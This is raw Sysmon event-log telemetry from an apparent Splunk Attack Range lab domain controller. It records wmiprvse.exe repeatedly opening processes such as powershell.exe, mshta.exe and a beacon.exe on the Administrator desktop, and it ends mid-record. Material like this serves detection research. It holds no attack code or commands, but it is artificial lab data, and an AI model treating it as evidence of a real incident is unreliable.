16:54:03.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240554Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240553Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240552Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.529{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240551Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.529{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240550Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.529{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240549Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.529{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240548Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.529{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6DAB-603E-BFAA-00000000AD01}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002240547Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240546Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.529{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6DAB-603E-BFAA-00000000AD01}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002240545Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.531{05ADC7E1-6DAB-603E-BFAA-00000000AD01}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002240544Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002240543Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:54:03.529{05ADC7E1-6DAB-603E-BBAA-00000000AD01}14536\PSHost.132591776433858326.14536.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002240542Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240541Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240540Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240539Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240538Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240537Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240536Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002240535Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.529{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1CA7285DD48202D96EF4B4898A4EAED,SHA256=BF3217C1038662B08FA8F55C3B58311B74521FACECE243A7931F46BECC0F92D5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240534Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240533Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240532Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 